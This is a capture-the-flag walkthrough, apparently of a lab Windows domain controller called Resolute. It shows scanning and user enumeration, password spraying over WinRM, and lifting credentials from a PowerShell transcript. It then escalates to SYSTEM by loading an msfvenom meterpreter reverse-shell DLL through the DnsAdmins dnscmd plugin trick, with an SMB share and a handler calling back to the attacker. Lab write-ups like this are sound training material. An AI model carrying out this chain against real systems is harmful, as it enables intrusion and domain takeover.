NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 17:59 IST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 17:59 Completed NSE at 17:59, 0.00s elapsed Initiating NSE at 17:59 Completed NSE at 17:59, 0.00s elapsed Initiating NSE at 17:59 Completed NSE at 17:59, 0.00s elapsed Initiating Ping Scan at 17:59 Scanning 10.10.10.169 [4 ports] Completed Ping Scan at 17:59, 0.61s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 17:59 Completed Parallel DNS resolution of 1 host. at 17:59, 0.55s elapsed Initiating SYN Stealth Scan at 17:59 Scanning 10.10.10.169 [1000 ports] Discovered open port 135/tcp on 10.10.10.169 Discovered open port 139/tcp on 10.10.10.169 Discovered open port 445/tcp on 10.10.10.169 Discovered open port 53/tcp on 10.10.10.169 Discovered open port 636/tcp on 10.10.10.169 Discovered open port 88/tcp on 10.10.10.169 Discovered open port 593/tcp on 10.10.10.169 Discovered open port 389/tcp on 10.10.10.169 Discovered open port 464/tcp on 10.10.10.169 Discovered open port 3268/tcp on 10.10.10.169 Discovered open port 3269/tcp on 10.10.10.169 Completed SYN Stealth Scan at 17:59, 5.30s elapsed (1000 total ports) Initiating Service scan at 17:59 Scanning 11 services on 10.10.10.169 Completed Service scan at 17:59, 32.87s elapsed (11 services on 1 host) Initiating OS detection (try #1) against 10.10.10.169 Retrying OS detection (try #2) against 10.10.10.169 Retrying OS detection (try #3) against 10.10.10.169 Initiating Traceroute at 17:59 Completed Traceroute at 17:59, 0.24s elapsed Initiating Parallel DNS resolution of 2 hosts. at 17:59 Completed Parallel DNS resolution of 2 hosts. at 17:59, 0.21s elapsed NSE: Script scanning 10.10.10.169. Initiating NSE at 17:59 Completed NSE at 18:00, 19.85s elapsed Initiating NSE at 18:00 Completed NSE at 18:02, 121.98s elapsed Initiating NSE at 18:02 Completed NSE at 18:02, 0.00s elapsed Nmap scan report for 10.10.10.169 Host is up (0.48s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-29 12:40:45Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=5/29%Time=5ED10024%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (95%), Microsoft Windows Server 2016 (94%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 10 (92%), Microsoft Windows 10 1507 (92%), Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.103 days (since Fri May 29 15:33:50 2020) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: Randomized Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h31m25s, deviation: 4h02m30s, median: 11m24s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Resolute | NetBIOS computer name: RESOLUTE\x00 | Domain name: megabank.local | Forest name: megabank.local | FQDN: Resolute.megabank.local |_ System time: 2020-05-29T05:41:21-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-05-29T12:41:23 |_ start_date: 2020-05-29T11:52:09 TRACEROUTE (using port 110/tcp) HOP RTT ADDRESS 1 201.02 ms 10.10.14.1 2 239.28 ms 10.10.10.169 NSE: Script Post-scanning. Initiating NSE at 18:02 Completed NSE at 18:02, 0.00s elapsed Initiating NSE at 18:02 Completed NSE at 18:02, 0.00s elapsed Initiating NSE at 18:02 Completed NSE at 18:02, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 190.07 seconds Raw packets sent: 1284 (58.614KB) | Rcvd: 1164 (48.694KB)
ENUMERATING FOR USERS
user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[ryan] rid:[0x451] user:[marko] rid:[0x457] user:[sunita] rid:[0x19c9] user:[abigail] rid:[0x19ca] user:[marcus] rid:[0x19cb] user:[sally] rid:[0x19cc] user:[fred] rid:[0x19cd] user:[angela] rid:[0x19ce] user:[felicia] rid:[0x19cf] user:[gustavo] rid:[0x19d0] user:[ulf] rid:[0x19d1] user:[stevie] rid:[0x19d2] user:[claire] rid:[0x19d3] user:[paulo] rid:[0x19d4] user:[steve] rid:[0x19d5] user:[annette] rid:[0x19d6] user:[annika] rid:[0x19d7] user:[per] rid:[0x19d8] user:[claude] rid:[0x19d9] user:[melanie] rid:[0x2775] user:[zach] rid:[0x2776] user:[simon] rid:[0x2777] user:[naoki] rid:[0x2778]
Here After Going through names one by one I Got Password for marko!!
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
USING THOSE CREDENTIALS
root@liquid:~/Desktop/HTB/resolute# evil-winrm -u marko -p Welcome123! -i 10.10.10.169 Evil-WinRM shell v2.0 Info: Establishing connection to remote endpoint Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError Error: Exiting with code 1
Here We got Error Now its time to get real name for this password!!!
As we already have list of Users
After using winrm login bruteforce I gir melanie as user !!
Lets Login Again and grab the Flag!!
root@liquid:~/Desktop/HTB/resolute# evil-winrm -u melanie -p Welcome123! -i 10.10.10.169 Evil-WinRM shell v2.0 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt 0c3be45fcfe249796ccbee8d3a978540 *Evil-WinRM* PS C:\Users\melanie\Desktop>
Lets Get Another User
*Evil-WinRM* PS C:\> ls -hidden Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN d--hsl 9/25/2019 10:17 AM Documents and Settings d--h-- 9/25/2019 10:48 AM ProgramData d--h-- 12/3/2019 6:32 AM PSTranscripts d--hs- 9/25/2019 10:17 AM Recovery d--hs- 9/25/2019 6:25 AM System Volume Information -arhs- 11/20/2016 5:59 PM 389408 bootmgr -a-hs- 7/16/2016 6:10 AM 1 BOOTNXT -a-hs- 5/30/2020 10:49 AM 402653184 pagefile.sys
We Have more hidden files under this!!
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU. 20191203063201.txt ********************** Windows PowerShell transcript start Start time: 20191203063201 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** Command start time: 20191203063455 ********************** PS>TerminatingError(): "System error." >> CommandInvocation(Invoke-Expression): "Invoke-Expression" >> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@', $env:computername,' ',$((gi $pwd).Name),'> ') if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }" >> CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="Stream"; value="True" ********************** Command start time: 20191203063455 ********************** PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> " PS megabank\ryan@RESOLUTE Documents> ********************** Command start time: 20191203063515 ********************** PS>CommandInvocation(Invoke-Expression): "Invoke-Expression" >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }" >> CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="Stream"; value="True" ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** ********************** Command start time: 20191203063515 ********************** PS>CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:" cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 **********************
ryan : Serv3r4Admin4cc123!
root@liquid:~/Desktop/HTB/resolute# evil-winrm -i resolute.htb -u ryan -p Serv3r4Admin4cc123! Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ryan\Documents>
GETTING ROOT ACCESS
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all USER INFORMATION ---------------- User Name SID ============= ============================================== megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled.
user ryan is in dnsadmin group
root@liquid:~/Desktop/HTB/resolute# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.140 LPORT=9977 -f dll > liquid.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of dll file: 5120 bytes
After This I have to Access this dll !!
It could be by uploading Or thorugh smbserver!!
root@liquid:~/Desktop/HTB/resolute# python smbserver.py -smb2support EXPLOIT /root/Desktop/HTB/resolute/ Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed
Then in victims machine
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> dnscmd /config /serverlevelplugindll \\10.10.14.140\EXPLOIT\liquid.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> sc.exe stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> sc.exe start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 3048 FLAGS :
msfconsole
msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.4:5678 [*] Sending stage (206403 bytes) to 10.10.10.169 [*] Meterpreter session 3 opened (10.10.14.4:5678 -> 10.10.10.169:60148) at 2020-05-30 11:20:31 -0400 meterpreter > meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > cd ../../../ meterpreter > cat root.txt e1d94876a506850d0c20edb5405e619c